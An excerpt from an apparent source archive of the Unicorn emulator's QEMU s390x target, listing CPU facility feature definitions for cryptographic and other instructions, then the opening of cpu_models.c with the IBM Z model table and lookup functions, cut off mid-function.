DEF_FEAT(PTFF_QSIE, "ptff-qsie", PTFF, 10, "PTFF Query Steering Information Extended") DEF_FEAT(PTFF_QTOUE, "ptff-qtoue", PTFF, 13, "PTFF Query TOD Offset User Extended") DEF_FEAT(PTFF_STO, "ptff-sto", PTFF, 65, "PTFF Set TOD Offset") DEF_FEAT(PTFF_STOU, "ptff-stou", PTFF, 69, "PTFF Set TOD Offset User") DEF_FEAT(PTFF_STOE, "ptff-stoe", PTFF, 73, "PTFF Set TOD Offset Extended") DEF_FEAT(PTFF_STOUE, "ptff-stoue", PTFF, 77, "PTFF Set TOD Offset User Extended") /* Features exposed via the KMAC instruction. 
*/ DEF_FEAT(KMAC_DEA, "kmac-dea", KMAC, 1, "KMAC DEA") DEF_FEAT(KMAC_TDEA_128, "kmac-tdea-128", KMAC, 2, "KMAC TDEA-128") DEF_FEAT(KMAC_TDEA_192, "kmac-tdea-192", KMAC, 3, "KMAC TDEA-192") DEF_FEAT(KMAC_EDEA, "kmac-edea", KMAC, 9, "KMAC Encrypted-DEA") DEF_FEAT(KMAC_ETDEA_128, "kmac-etdea-128", KMAC, 10, "KMAC Encrypted-TDEA-128") DEF_FEAT(KMAC_ETDEA_192, "kmac-etdea-192", KMAC, 11, "KMAC Encrypted-TDEA-192") DEF_FEAT(KMAC_AES_128, "kmac-aes-128", KMAC, 18, "KMAC AES-128") DEF_FEAT(KMAC_AES_192, "kmac-aes-192", KMAC, 19, "KMAC AES-192") DEF_FEAT(KMAC_AES_256, "kmac-aes-256", KMAC, 20, "KMAC AES-256") DEF_FEAT(KMAC_EAES_128, "kmac-eaes-128", KMAC, 26, "KMAC Encrypted-AES-128") DEF_FEAT(KMAC_EAES_192, "kmac-eaes-192", KMAC, 27, "KMAC Encrypted-AES-192") DEF_FEAT(KMAC_EAES_256, "kmac-eaes-256", KMAC, 28, "KMAC Encrypted-AES-256") /* Features exposed via the KMC instruction. */ DEF_FEAT(KMC_DEA, "kmc-dea", KMC, 1, "KMC DEA") DEF_FEAT(KMC_TDEA_128, "kmc-tdea-128", KMC, 2, "KMC TDEA-128") DEF_FEAT(KMC_TDEA_192, "kmc-tdea-192", KMC, 3, "KMC TDEA-192") DEF_FEAT(KMC_EDEA, "kmc-edea", KMC, 9, "KMC Encrypted-DEA") DEF_FEAT(KMC_ETDEA_128, "kmc-etdea-128", KMC, 10, "KMC Encrypted-TDEA-128") DEF_FEAT(KMC_ETDEA_192, "kmc-etdea-192", KMC, 11, "KMC Encrypted-TDEA-192") DEF_FEAT(KMC_AES_128, "kmc-aes-128", KMC, 18, "KMC AES-128") DEF_FEAT(KMC_AES_192, "kmc-aes-192", KMC, 19, "KMC AES-192") DEF_FEAT(KMC_AES_256, "kmc-aes-256", KMC, 20, "KMC AES-256") DEF_FEAT(KMC_EAES_128, "kmc-eaes-128", KMC, 26, "KMC Encrypted-AES-128") DEF_FEAT(KMC_EAES_192, "kmc-eaes-192", KMC, 27, "KMC Encrypted-AES-192") DEF_FEAT(KMC_EAES_256, "kmc-eaes-256", KMC, 28, "KMC Encrypted-AES-256") DEF_FEAT(KMC_PRNG, "kmc-prng", KMC, 67, "KMC PRNG") /* Features exposed via the KM instruction. */ DEF_FEAT(KM_DEA, "km-dea", KM, 1, "KM DEA") DEF_FEAT(KM_TDEA_128, "km-tdea-128", KM, 2, "KM TDEA-128") DEF_FEAT(KM_TDEA_192, "km-tdea-192", KM, 3, "KM TDEA-192") DEF_FEAT(KM_EDEA, "km-edea", KM, 9, "KM Encrypted-DEA") DEF_FEAT(KM_ETDEA_128, "km-etdea-128", KM, 10, "KM Encrypted-TDEA-128") DEF_FEAT(KM_ETDEA_192, "km-etdea-192", KM, 11, "KM Encrypted-TDEA-192") DEF_FEAT(KM_AES_128, "km-aes-128", KM, 18, "KM AES-128") DEF_FEAT(KM_AES_192, "km-aes-192", KM, 19, "KM AES-192") DEF_FEAT(KM_AES_256, "km-aes-256", KM, 20, "KM AES-256") DEF_FEAT(KM_EAES_128, "km-eaes-128", KM, 26, "KM Encrypted-AES-128") DEF_FEAT(KM_EAES_192, "km-eaes-192", KM, 27, "KM Encrypted-AES-192") DEF_FEAT(KM_EAES_256, "km-eaes-256", KM, 28, "KM Encrypted-AES-256") DEF_FEAT(KM_XTS_AES_128, "km-xts-aes-128", KM, 50, "KM XTS-AES-128") DEF_FEAT(KM_XTS_AES_256, "km-xts-aes-256", KM, 52, "KM XTS-AES-256") DEF_FEAT(KM_XTS_EAES_128, "km-xts-eaes-128", KM, 58, "KM XTS-Encrypted-AES-128") DEF_FEAT(KM_XTS_EAES_256, "km-xts-eaes-256", KM, 60, "KM XTS-Encrypted-AES-256") /* Features exposed via the KIMD instruction. 
*/ DEF_FEAT(KIMD_SHA_1, "kimd-sha-1", KIMD, 1, "KIMD SHA-1") DEF_FEAT(KIMD_SHA_256, "kimd-sha-256", KIMD, 2, "KIMD SHA-256") DEF_FEAT(KIMD_SHA_512, "kimd-sha-512", KIMD, 3, "KIMD SHA-512") DEF_FEAT(KIMD_SHA3_224, "kimd-sha3-224", KIMD, 32, "KIMD SHA3-224") DEF_FEAT(KIMD_SHA3_256, "kimd-sha3-256", KIMD, 33, "KIMD SHA3-256") DEF_FEAT(KIMD_SHA3_384, "kimd-sha3-384", KIMD, 34, "KIMD SHA3-384") DEF_FEAT(KIMD_SHA3_512, "kimd-sha3-512", KIMD, 35, "KIMD SHA3-512") DEF_FEAT(KIMD_SHAKE_128, "kimd-shake-128", KIMD, 36, "KIMD SHAKE-128") DEF_FEAT(KIMD_SHAKE_256, "kimd-shake-256", KIMD, 37, "KIMD SHAKE-256") DEF_FEAT(KIMD_GHASH, "kimd-ghash", KIMD, 65, "KIMD GHASH") /* Features exposed via the KLMD instruction. */ DEF_FEAT(KLMD_SHA_1, "klmd-sha-1", KLMD, 1, "KLMD SHA-1") DEF_FEAT(KLMD_SHA_256, "klmd-sha-256", KLMD, 2, "KLMD SHA-256") DEF_FEAT(KLMD_SHA_512, "klmd-sha-512", KLMD, 3, "KLMD SHA-512") DEF_FEAT(KLMD_SHA3_224, "klmd-sha3-224", KLMD, 32, "KLMD SHA3-224") DEF_FEAT(KLMD_SHA3_256, "klmd-sha3-256", KLMD, 33, "KLMD SHA3-256") DEF_FEAT(KLMD_SHA3_384, "klmd-sha3-384", KLMD, 34, "KLMD SHA3-384") DEF_FEAT(KLMD_SHA3_512, "klmd-sha3-512", KLMD, 35, "KLMD SHA3-512") DEF_FEAT(KLMD_SHAKE_128, "klmd-shake-128", KLMD, 36, "KLMD SHAKE-128") DEF_FEAT(KLMD_SHAKE_256, "klmd-shake-256", KLMD, 37, "KLMD SHAKE-256") /* Features exposed via the PCKMO instruction. */ DEF_FEAT(PCKMO_EDEA, "pckmo-edea", PCKMO, 1, "PCKMO Encrypted-DEA-Key") DEF_FEAT(PCKMO_ETDEA_128, "pckmo-etdea-128", PCKMO, 2, "PCKMO Encrypted-TDEA-128-Key") DEF_FEAT(PCKMO_ETDEA_256, "pckmo-etdea-192", PCKMO, 3, "PCKMO Encrypted-TDEA-192-Key") DEF_FEAT(PCKMO_AES_128, "pckmo-aes-128", PCKMO, 18, "PCKMO Encrypted-AES-128-Key") DEF_FEAT(PCKMO_AES_192, "pckmo-aes-192", PCKMO, 19, "PCKMO Encrypted-AES-192-Key") DEF_FEAT(PCKMO_AES_256, "pckmo-aes-256", PCKMO, 20, "PCKMO Encrypted-AES-256-Key") DEF_FEAT(PCKMO_ECC_P256, "pckmo-ecc-p256", PCKMO, 32, "PCKMO Encrypt-ECC-P256-Key") DEF_FEAT(PCKMO_ECC_P384, "pckmo-ecc-p384", PCKMO, 33, "PCKMO Encrypt-ECC-P384-Key") DEF_FEAT(PCKMO_ECC_P521, "pckmo-ecc-p521", PCKMO, 34, "PCKMO Encrypt-ECC-P521-Key") DEF_FEAT(PCKMO_ECC_ED25519, "pckmo-ecc-ed25519", PCKMO, 40 , "PCKMO Encrypt-ECC-Ed25519-Key") DEF_FEAT(PCKMO_ECC_ED448, "pckmo-ecc-ed448", PCKMO, 41 , "PCKMO Encrypt-ECC-Ed448-Key") /* Features exposed via the KMCTR instruction. */ DEF_FEAT(KMCTR_DEA, "kmctr-dea", KMCTR, 1, "KMCTR DEA") DEF_FEAT(KMCTR_TDEA_128, "kmctr-tdea-128", KMCTR, 2, "KMCTR TDEA-128") DEF_FEAT(KMCTR_TDEA_192, "kmctr-tdea-192", KMCTR, 3, "KMCTR TDEA-192") DEF_FEAT(KMCTR_EDEA, "kmctr-edea", KMCTR, 9, "KMCTR Encrypted-DEA") DEF_FEAT(KMCTR_ETDEA_128, "kmctr-etdea-128", KMCTR, 10, "KMCTR Encrypted-TDEA-128") DEF_FEAT(KMCTR_ETDEA_192, "kmctr-etdea-192", KMCTR, 11, "KMCTR Encrypted-TDEA-192") DEF_FEAT(KMCTR_AES_128, "kmctr-aes-128", KMCTR, 18, "KMCTR AES-128") DEF_FEAT(KMCTR_AES_192, "kmctr-aes-192", KMCTR, 19, "KMCTR AES-192") DEF_FEAT(KMCTR_AES_256, "kmctr-aes-256", KMCTR, 20, "KMCTR AES-256") DEF_FEAT(KMCTR_EAES_128, "kmctr-eaes-128", KMCTR, 26, "KMCTR Encrypted-AES-128") DEF_FEAT(KMCTR_EAES_192, "kmctr-eaes-192", KMCTR, 27, "KMCTR Encrypted-AES-192") DEF_FEAT(KMCTR_EAES_256, "kmctr-eaes-256", KMCTR, 28, "KMCTR Encrypted-AES-256") /* Features exposed via the KMF instruction. 
*/ DEF_FEAT(KMF_DEA, "kmf-dea", KMF, 1, "KMF DEA") DEF_FEAT(KMF_TDEA_128, "kmf-tdea-128", KMF, 2, "KMF TDEA-128") DEF_FEAT(KMF_TDEA_192, "kmf-tdea-192", KMF, 3, "KMF TDEA-192") DEF_FEAT(KMF_EDEA, "kmf-edea", KMF, 9, "KMF Encrypted-DEA") DEF_FEAT(KMF_ETDEA_128, "kmf-etdea-128", KMF, 10, "KMF Encrypted-TDEA-128") DEF_FEAT(KMF_ETDEA_192, "kmf-etdea-192", KMF, 11, "KMF Encrypted-TDEA-192") DEF_FEAT(KMF_AES_128, "kmf-aes-128", KMF, 18, "KMF AES-128") DEF_FEAT(KMF_AES_192, "kmf-aes-192", KMF, 19, "KMF AES-192") DEF_FEAT(KMF_AES_256, "kmf-aes-256", KMF, 20, "KMF AES-256") DEF_FEAT(KMF_EAES_128, "kmf-eaes-128", KMF, 26, "KMF Encrypted-AES-128") DEF_FEAT(KMF_EAES_192, "kmf-eaes-192", KMF, 27, "KMF Encrypted-AES-192") DEF_FEAT(KMF_EAES_256, "kmf-eaes-256", KMF, 28, "KMF Encrypted-AES-256") /* Features exposed via the KMO instruction. */ DEF_FEAT(KMO_DEA, "kmo-dea", KMO, 1, "KMO DEA") DEF_FEAT(KMO_TDEA_128, "kmo-tdea-128", KMO, 2, "KMO TDEA-128") DEF_FEAT(KMO_TDEA_192, "kmo-tdea-192", KMO, 3, "KMO TDEA-192") DEF_FEAT(KMO_EDEA, "kmo-edea", KMO, 9, "KMO Encrypted-DEA") DEF_FEAT(KMO_ETDEA_128, "kmo-etdea-128", KMO, 10, "KMO Encrypted-TDEA-128") DEF_FEAT(KMO_ETDEA_192, "kmo-etdea-192", KMO, 11, "KMO Encrypted-TDEA-192") DEF_FEAT(KMO_AES_128, "kmo-aes-128", KMO, 18, "KMO AES-128") DEF_FEAT(KMO_AES_192, "kmo-aes-192", KMO, 19, "KMO AES-192") DEF_FEAT(KMO_AES_256, "kmo-aes-256", KMO, 20, "KMO AES-256") DEF_FEAT(KMO_EAES_128, "kmo-eaes-128", KMO, 26, "KMO Encrypted-AES-128") DEF_FEAT(KMO_EAES_192, "kmo-eaes-192", KMO, 27, "KMO Encrypted-AES-192") DEF_FEAT(KMO_EAES_256, "kmo-eaes-256", KMO, 28, "KMO Encrypted-AES-256") /* Features exposed via the PCC instruction. */ DEF_FEAT(PCC_CMAC_DEA, "pcc-cmac-dea", PCC, 1, "PCC Compute-Last-Block-CMAC-Using-DEA") DEF_FEAT(PCC_CMAC_TDEA_128, "pcc-cmac-tdea-128", PCC, 2, "PCC Compute-Last-Block-CMAC-Using-TDEA-128") DEF_FEAT(PCC_CMAC_TDEA_192, "pcc-cmac-tdea-192", PCC, 3, "PCC Compute-Last-Block-CMAC-Using-TDEA-192") DEF_FEAT(PCC_CMAC_ETDEA_128, "pcc-cmac-edea", PCC, 9, "PCC Compute-Last-Block-CMAC-Using-Encrypted-DEA") DEF_FEAT(PCC_CMAC_ETDEA_192, "pcc-cmac-etdea-128", PCC, 10, "PCC Compute-Last-Block-CMAC-Using-Encrypted-TDEA-128") DEF_FEAT(PCC_CMAC_TDEA, "pcc-cmac-etdea-192", PCC, 11, "PCC Compute-Last-Block-CMAC-Using-EncryptedTDEA-192") DEF_FEAT(PCC_CMAC_AES_128, "pcc-cmac-aes-128", PCC, 18, "PCC Compute-Last-Block-CMAC-Using-AES-128") DEF_FEAT(PCC_CMAC_AES_192, "pcc-cmac-aes-192", PCC, 19, "PCC Compute-Last-Block-CMAC-Using-AES-192") DEF_FEAT(PCC_CMAC_AES_256, "pcc-cmac-eaes-256", PCC, 20, "PCC Compute-Last-Block-CMAC-Using-AES-256") DEF_FEAT(PCC_CMAC_EAES_128, "pcc-cmac-eaes-128", PCC, 26, "PCC Compute-Last-Block-CMAC-Using-Encrypted-AES-128") DEF_FEAT(PCC_CMAC_EAES_192, "pcc-cmac-eaes-192", PCC, 27, "PCC Compute-Last-Block-CMAC-Using-Encrypted-AES-192") DEF_FEAT(PCC_CMAC_EAES_256, "pcc-cmac-eaes-256", PCC, 28, "PCC Compute-Last-Block-CMAC-Using-Encrypted-AES-256") DEF_FEAT(PCC_XTS_AES_128, "pcc-xts-aes-128", PCC, 50, "PCC Compute-XTS-Parameter-Using-AES-128") DEF_FEAT(PCC_XTS_AES_256, "pcc-xts-aes-256", PCC, 52, "PCC Compute-XTS-Parameter-Using-AES-256") DEF_FEAT(PCC_XTS_EAES_128, "pcc-xts-eaes-128", PCC, 58, "PCC Compute-XTS-Parameter-Using-Encrypted-AES-128") DEF_FEAT(PCC_XTS_EAES_256, "pcc-xts-eaes-256", PCC, 60, "PCC Compute-XTS-Parameter-Using-Encrypted-AES-256") DEF_FEAT(PCC_SCALAR_MULT_P256, "pcc-scalar-mult-p256", PCC, 64, "PCC Scalar-Multiply-P256") DEF_FEAT(PCC_SCALAR_MULT_P384, "pcc-scalar-mult-p384", PCC, 65, "PCC Scalar-Multiply-P384") 
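
/*
 * Illustrative note, not part of the original file: each DEF_FEAT entry here
 * expands twice. Included from cpu_features_def.h it becomes an S390Feat
 * enumerator, and included from cpu_features.c it becomes an s390_features[]
 * table initializer; e.g. the preceding entry expands to
 *
 *     S390_FEAT_PCC_SCALAR_MULT_P384,
 *
 * and
 *
 *     [S390_FEAT_PCC_SCALAR_MULT_P384] = {
 *         .name = "pcc-scalar-mult-p384",
 *         .type = S390_FEAT_TYPE_PCC,
 *         .bit = 65,
 *         .desc = "PCC Scalar-Multiply-P384",
 *     },
 */
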
DEF_FEAT(PCC_SCALAR_MULT_P512, "pcc-scalar-mult-p521", PCC, 66, "PCC Scalar-Multiply-P521") DEF_FEAT(PCC_SCALAR_MULT_ED25519, "pcc-scalar-mult-ed25519", PCC, 72, "PCC Scalar-Multiply-Ed25519") DEF_FEAT(PCC_SCALAR_MULT_ED448, "pcc-scalar-mult-ed448", PCC, 73, "PCC Scalar-Multiply-Ed448") DEF_FEAT(PCC_SCALAR_MULT_X25519, "pcc-scalar-mult-x25519", PCC, 80, "PCC Scalar-Multiply-X25519") DEF_FEAT(PCC_SCALAR_MULT_X448, "pcc-scalar-mult-x448", PCC, 81, "PCC Scalar-Multiply-X448") /* Features exposed via the PPNO/PRNO instruction. */ DEF_FEAT(PPNO_SHA_512_DRNG, "ppno-sha-512-drng", PPNO, 3, "PPNO SHA-512-DRNG") DEF_FEAT(PRNO_TRNG_QRTCR, "prno-trng-qrtcr", PPNO, 112, "PRNO TRNG-Query-Raw-to-Conditioned-Ratio") DEF_FEAT(PRNO_TRNG, "prno-trng", PPNO, 114, "PRNO TRNG") /* Features exposed via the KMA instruction. */ DEF_FEAT(KMA_GCM_AES_128, "kma-gcm-aes-128", KMA, 18, "KMA GCM-AES-128") DEF_FEAT(KMA_GCM_AES_192, "kma-gcm-aes-192", KMA, 19, "KMA GCM-AES-192") DEF_FEAT(KMA_GCM_AES_256, "kma-gcm-aes-256", KMA, 20, "KMA GCM-AES-256") DEF_FEAT(KMA_GCM_EAES_128, "kma-gcm-eaes-128", KMA, 26, "KMA GCM-Encrypted-AES-128") DEF_FEAT(KMA_GCM_EAES_192, "kma-gcm-eaes-192", KMA, 27, "KMA GCM-Encrypted-AES-192") DEF_FEAT(KMA_GCM_EAES_256, "kma-gcm-eaes-256", KMA, 28, "KMA GCM-Encrypted-AES-256") /* Features exposed via the KDSA instruction. */ DEF_FEAT(KDSA_ECDSA_VERIFY_P256, "kdsa-ecdsa-verify-p256", KDSA, 1, "KDSA ECDSA-Verify-P256") DEF_FEAT(KDSA_ECDSA_VERIFY_P384, "kdsa-ecdsa-verify-p384", KDSA, 2, "KDSA ECDSA-Verify-P384") DEF_FEAT(KDSA_ECDSA_VERIFY_P512, "kdsa-ecdsa-verify-p521", KDSA, 3, "KDSA ECDSA-Verify-P521") DEF_FEAT(KDSA_ECDSA_SIGN_P256, "kdsa-ecdsa-sign-p256", KDSA, 9, "KDSA ECDSA-Sign-P256") DEF_FEAT(KDSA_ECDSA_SIGN_P384, "kdsa-ecdsa-sign-p384", KDSA, 10, "KDSA ECDSA-Sign-P384") DEF_FEAT(KDSA_ECDSA_SIGN_P512, "kdsa-ecdsa-sign-p521", KDSA, 11, "KDSA ECDSA-Sign-P521") DEF_FEAT(KDSA_EECDSA_SIGN_P256, "kdsa-eecdsa-sign-p256", KDSA, 17, "KDSA Encrypted-ECDSA-Sign-P256") DEF_FEAT(KDSA_EECDSA_SIGN_P384, "kdsa-eecdsa-sign-p384", KDSA, 18, "KDSA Encrypted-ECDSA-Sign-P384") DEF_FEAT(KDSA_EECDSA_SIGN_P512, "kdsa-eecdsa-sign-p521", KDSA, 19, "KDSA Encrypted-ECDSA-Sign-P521") DEF_FEAT(KDSA_EDDSA_VERIFY_ED25519, "kdsa-eddsa-verify-ed25519", KDSA, 32, "KDSA EdDSA-Verify-Ed25519") DEF_FEAT(KDSA_EDDSA_VERIFY_ED448, "kdsa-eddsa-verify-ed448", KDSA, 36, "KDSA EdDSA-Verify-Ed448") DEF_FEAT(KDSA_EDDSA_SIGN_ED25519, "kdsa-eddsa-sign-ed25519", KDSA, 40, "KDSA EdDSA-Sign-Ed25519") DEF_FEAT(KDSA_EDDSA_SIGN_ED448, "kdsa-eddsa-sign-ed448", KDSA, 44, "KDSA EdDSA-Sign-Ed448") DEF_FEAT(KDSA_EEDDSA_SIGN_ED25519, "kdsa-eeddsa-sign-ed25519", KDSA, 48, "KDSA Encrypted-EdDSA-Sign-Ed25519") DEF_FEAT(KDSA_EEDDSA_SIGN_ED448, "kdsa-eeddsa-sign-ed448", KDSA, 52, "KDSA Encrypted-EdDSA-Sign-Ed448") /* Features exposed via the SORTL instruction. */ DEF_FEAT(SORTL_SFLR, "sortl-sflr", SORTL, 1, "SORTL SFLR") DEF_FEAT(SORTL_SVLR, "sortl-svlr", SORTL, 2, "SORTL SVLR") DEF_FEAT(SORTL_32, "sortl-32", SORTL, 130, "SORTL 32 input lists") DEF_FEAT(SORTL_128, "sortl-128", SORTL, 132, "SORTL 128 input lists") DEF_FEAT(SORTL_F0, "sortl-f0", SORTL, 192, "SORTL format 0 parameter-block") /* Features exposed via the DEFLATE instruction. 
*/ DEF_FEAT(DEFLATE_GHDT, "dfltcc-gdht", DFLTCC, 1, "DFLTCC GDHT") DEF_FEAT(DEFLATE_CMPR, "dfltcc-cmpr", DFLTCC, 2, "DFLTCC CMPR") DEF_FEAT(DEFLATE_XPND, "dfltcc-xpnd", DFLTCC, 4, "DFLTCC XPND") DEF_FEAT(DEFLATE_F0, "dfltcc-f0", DFLTCC, 192, "DFLTCC format 0 parameter-block") ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_models.c��������������������������������������������������������0000664�0000000�0000000�00000042475�14675241067�0020641�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * CPU models for s390x * * Copyright 2016 IBM Corp. * * Author(s): David Hildenbrand <dahi@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "sysemu/tcg.h" #include "qemu-common.h" //#include "hw/pci/pci.h" #define CPUDEF_INIT(_type, _gen, _ec_ga, _mha_pow, _hmfai, _name, _desc) \ { \ .name = _name, \ .type = _type, \ .gen = _gen, \ .ec_ga = _ec_ga, \ .mha_pow = _mha_pow, \ .hmfai = _hmfai, \ .desc = _desc, \ .base_init = { S390_FEAT_LIST_GEN ## _gen ## _GA ## _ec_ga ## _BASE }, \ .default_init = { S390_FEAT_LIST_GEN ## _gen ## _GA ## _ec_ga ## _DEFAULT }, \ .full_init = { S390_FEAT_LIST_GEN ## _gen ## _GA ## _ec_ga ## _FULL }, \ } /* * CPU definition list in order of release. Up to generation 14 base features * of a following release have been a superset of the previous release. With * generation 15 one base feature and one optional feature have been deprecated. 
*/ static S390CPUDef s390_cpu_defs[] = { CPUDEF_INIT(0x2064, 7, 1, 38, 0x00000000U, "z900", "IBM zSeries 900 GA1"), CPUDEF_INIT(0x2064, 7, 2, 38, 0x00000000U, "z900.2", "IBM zSeries 900 GA2"), CPUDEF_INIT(0x2064, 7, 3, 38, 0x00000000U, "z900.3", "IBM zSeries 900 GA3"), CPUDEF_INIT(0x2066, 7, 3, 38, 0x00000000U, "z800", "IBM zSeries 800 GA1"), CPUDEF_INIT(0x2084, 8, 1, 38, 0x00000000U, "z990", "IBM zSeries 990 GA1"), CPUDEF_INIT(0x2084, 8, 2, 38, 0x00000000U, "z990.2", "IBM zSeries 990 GA2"), CPUDEF_INIT(0x2084, 8, 3, 38, 0x00000000U, "z990.3", "IBM zSeries 990 GA3"), CPUDEF_INIT(0x2086, 8, 3, 38, 0x00000000U, "z890", "IBM zSeries 880 GA1"), CPUDEF_INIT(0x2084, 8, 4, 38, 0x00000000U, "z990.4", "IBM zSeries 990 GA4"), CPUDEF_INIT(0x2086, 8, 4, 38, 0x00000000U, "z890.2", "IBM zSeries 880 GA2"), CPUDEF_INIT(0x2084, 8, 5, 38, 0x00000000U, "z990.5", "IBM zSeries 990 GA5"), CPUDEF_INIT(0x2086, 8, 5, 38, 0x00000000U, "z890.3", "IBM zSeries 880 GA3"), CPUDEF_INIT(0x2094, 9, 1, 40, 0x00000000U, "z9EC", "IBM System z9 EC GA1"), CPUDEF_INIT(0x2094, 9, 2, 40, 0x00000000U, "z9EC.2", "IBM System z9 EC GA2"), CPUDEF_INIT(0x2096, 9, 2, 40, 0x00000000U, "z9BC", "IBM System z9 BC GA1"), CPUDEF_INIT(0x2094, 9, 3, 40, 0x00000000U, "z9EC.3", "IBM System z9 EC GA3"), CPUDEF_INIT(0x2096, 9, 3, 40, 0x00000000U, "z9BC.2", "IBM System z9 BC GA2"), CPUDEF_INIT(0x2097, 10, 1, 43, 0x00000000U, "z10EC", "IBM System z10 EC GA1"), CPUDEF_INIT(0x2097, 10, 2, 43, 0x00000000U, "z10EC.2", "IBM System z10 EC GA2"), CPUDEF_INIT(0x2098, 10, 2, 43, 0x00000000U, "z10BC", "IBM System z10 BC GA1"), CPUDEF_INIT(0x2097, 10, 3, 43, 0x00000000U, "z10EC.3", "IBM System z10 EC GA3"), CPUDEF_INIT(0x2098, 10, 3, 43, 0x00000000U, "z10BC.2", "IBM System z10 BC GA2"), CPUDEF_INIT(0x2817, 11, 1, 44, 0x08000000U, "z196", "IBM zEnterprise 196 GA1"), CPUDEF_INIT(0x2817, 11, 2, 44, 0x08000000U, "z196.2", "IBM zEnterprise 196 GA2"), CPUDEF_INIT(0x2818, 11, 2, 44, 0x08000000U, "z114", "IBM zEnterprise 114 GA1"), CPUDEF_INIT(0x2827, 12, 1, 44, 0x08000000U, "zEC12", "IBM zEnterprise EC12 GA1"), CPUDEF_INIT(0x2827, 12, 2, 44, 0x08000000U, "zEC12.2", "IBM zEnterprise EC12 GA2"), CPUDEF_INIT(0x2828, 12, 2, 44, 0x08000000U, "zBC12", "IBM zEnterprise BC12 GA1"), CPUDEF_INIT(0x2964, 13, 1, 47, 0x08000000U, "z13", "IBM z13 GA1"), CPUDEF_INIT(0x2964, 13, 2, 47, 0x08000000U, "z13.2", "IBM z13 GA2"), CPUDEF_INIT(0x2965, 13, 2, 47, 0x08000000U, "z13s", "IBM z13s GA1"), CPUDEF_INIT(0x3906, 14, 1, 47, 0x08000000U, "z14", "IBM z14 GA1"), CPUDEF_INIT(0x3906, 14, 2, 47, 0x08000000U, "z14.2", "IBM z14 GA2"), CPUDEF_INIT(0x3907, 14, 1, 47, 0x08000000U, "z14ZR1", "IBM z14 Model ZR1 GA1"), CPUDEF_INIT(0x8561, 15, 1, 47, 0x08000000U, "gen15a", "IBM z15 GA1"), CPUDEF_INIT(0x8562, 15, 1, 47, 0x08000000U, "gen15b", "IBM 8562 GA1"), }; #define QEMU_MAX_CPU_TYPE 0x2964 #define QEMU_MAX_CPU_GEN 13 #define QEMU_MAX_CPU_EC_GA 2 static const S390FeatInit qemu_max_cpu_feat_init = { S390_FEAT_LIST_QEMU_MAX }; static S390FeatBitmap qemu_max_cpu_feat; /* features part of a base model but not relevant for finding a base model */ S390FeatBitmap ignored_base_feat; void s390_cpudef_featoff(uint8_t gen, uint8_t ec_ga, S390Feat feat) { const S390CPUDef *def; def = s390_find_cpu_def(0, gen, ec_ga, NULL); clear_bit(feat, (unsigned long *)&def->default_feat); } void s390_cpudef_featoff_greater(uint8_t gen, uint8_t ec_ga, S390Feat feat) { int i; for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { const S390CPUDef *def = &s390_cpu_defs[i]; if (def->gen < gen) { continue; } if (def->gen == gen && 
def->ec_ga < ec_ga) { continue; } clear_bit(feat, (unsigned long *)&def->default_feat); } } void s390_cpudef_group_featoff_greater(uint8_t gen, uint8_t ec_ga, S390FeatGroup group) { const S390FeatGroupDef *group_def = s390_feat_group_def(group); S390FeatBitmap group_def_off; int i; bitmap_complement(group_def_off, group_def->feat, S390_FEAT_MAX); for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { const S390CPUDef *cpu_def = &s390_cpu_defs[i]; if (cpu_def->gen < gen) { continue; } if (cpu_def->gen == gen && cpu_def->ec_ga < ec_ga) { continue; } bitmap_and((unsigned long *)&cpu_def->default_feat, cpu_def->default_feat, group_def_off, S390_FEAT_MAX); } } uint32_t s390_get_hmfai(void) { static S390CPU *cpu; if (!cpu) { cpu = S390_CPU(qemu_get_cpu(NULL, 0)); } if (!cpu || !cpu->model) { return 0; } return cpu->model->def->hmfai; } uint8_t s390_get_mha_pow(void) { static S390CPU *cpu; if (!cpu) { cpu = S390_CPU(qemu_get_cpu(NULL, 0)); } if (!cpu || !cpu->model) { return 0; } return cpu->model->def->mha_pow; } uint32_t s390_get_ibc_val(void) { uint16_t unblocked_ibc, lowest_ibc; static S390CPU *cpu; if (!cpu) { cpu = S390_CPU(qemu_get_cpu(NULL, 0)); } if (!cpu || !cpu->model) { return 0; } unblocked_ibc = s390_ibc_from_cpu_model(cpu->model); lowest_ibc = cpu->model->lowest_ibc; /* the lowest_ibc always has to be <= unblocked_ibc */ if (!lowest_ibc || lowest_ibc > unblocked_ibc) { return 0; } return ((uint32_t) lowest_ibc << 16) | unblocked_ibc; } void s390_get_feat_block(struct uc_struct *uc, S390FeatType type, uint8_t *data) { S390CPU *cpu = S390_CPU(qemu_get_cpu(uc, 0)); s390_fill_feat_block(cpu->model->features, type, data); } bool s390_has_feat(struct uc_struct *uc, S390Feat feat) { S390CPU *cpu = S390_CPU(qemu_get_cpu(uc, 0)); if (!cpu->model) { if (feat == S390_FEAT_ZPCI) { return true; } return false; } return test_bit(feat, cpu->model->features); } uint8_t s390_get_gen_for_cpu_type(uint16_t type) { int i; for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { if (s390_cpu_defs[i].type == type) { return s390_cpu_defs[i].gen; } } return 0; } const S390CPUDef *s390_find_cpu_def(uint16_t type, uint8_t gen, uint8_t ec_ga, S390FeatBitmap features) { const S390CPUDef *last_compatible = NULL; const S390CPUDef *matching_cpu_type = NULL; int i; if (!gen) { ec_ga = 0; } if (!gen && type) { gen = s390_get_gen_for_cpu_type(type); } for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { const S390CPUDef *def = &s390_cpu_defs[i]; S390FeatBitmap missing; /* don't even try newer generations if we know the generation */ if (gen) { if (def->gen > gen) { break; } else if (def->gen == gen && ec_ga && def->ec_ga > ec_ga) { break; } } if (features) { /* see if the model satisfies the minimum features */ bitmap_andnot(missing, def->base_feat, features, S390_FEAT_MAX); /* * Ignore certain features that are in the base model, but not * relevant for the search (esp. MSA subfunctions). */ bitmap_andnot(missing, missing, ignored_base_feat, S390_FEAT_MAX); if (!bitmap_empty(missing, S390_FEAT_MAX)) { break; } } /* stop the search if we found the exact model */ if (def->type == type && def->ec_ga == ec_ga) { return def; } /* remember if we've at least seen one with the same cpu type */ if (def->type == type) { 